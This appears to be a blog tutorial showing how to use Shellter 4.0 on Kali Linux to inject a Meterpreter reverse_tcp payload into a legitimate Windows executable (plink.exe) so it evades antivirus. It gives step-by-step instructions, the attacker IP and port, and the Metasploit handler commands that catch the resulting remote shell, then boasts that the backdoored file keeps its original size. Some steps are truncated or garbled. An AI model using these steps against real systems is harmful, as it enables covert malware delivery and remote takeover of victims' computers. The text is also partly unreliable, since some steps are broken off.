Having trouble getting a
Meterpreter shell past that pesky AV? Check out the new Shellter 4.0 shell
The latest version ofShellterfor
pentesters was revealed at B-Sides Lisbon earlier this month. Updates
include increased obfuscation through a custom encoder and polymorphic
decoder. Also this version saves a few steps by including the most common
Shellter works by taking a legit
Windows .exe file, adds the shell code to it and then does a great job of
modifying the file for AV bypass. The program’s automatic mode makes the
whole process very pain free. In this tutorial I used the latest version of
Kali Linux and a Windows 7 Virtual Machine.
**Note: the Kali repos apparently
don’t contain the newest 4.0 version yet. To get the latest, instead of
using ‘apt-get install shellter’, just download and extract the ZIP file to
the “/etc/share” folder.
2. Grab “plink.exe”
from Kali’s ‘usr/share/windows-binaries’ directory and copy it into the
3. Start Shellter – ‘shellter’
from the terminal or use ‘wineconsole shelter’ from ‘/etc/share/shellter’ if
you manually installed.
How to Bypass an Anti-Virus on Kali Linux 2017
4. Choose ‘A’ for Automatic Mode
5. At the PE Target Prompt, enter “plink.exe”
6. When prompted for Payloads select “L” and
7. Next, enter the IP address of your Kali system (mine is 192.168.1.39)
8. And the port to use (I used 5555)
Shellter will obfuscate the code and crunch for a while. Then you should see:
9. Now we need to start a listener service on
the Kali system using the same settings from above:
• start Metasploit (‘msfconsole’ in a
• use exploit/multi/handler
• set payload windows/meterpreter/reverse_tcp
• set lhost 192.168.1.39
• set lport 5555
10. Now that Kali is waiting for a connection.
Copy our evil plink.exe command
to the Windows 7 system and run it:
And we have a shell!
Compare the size of the backdoored exe to the original one. They are the exact same size! Now upload the backdoored exe to Virus total and scan it for malicious content: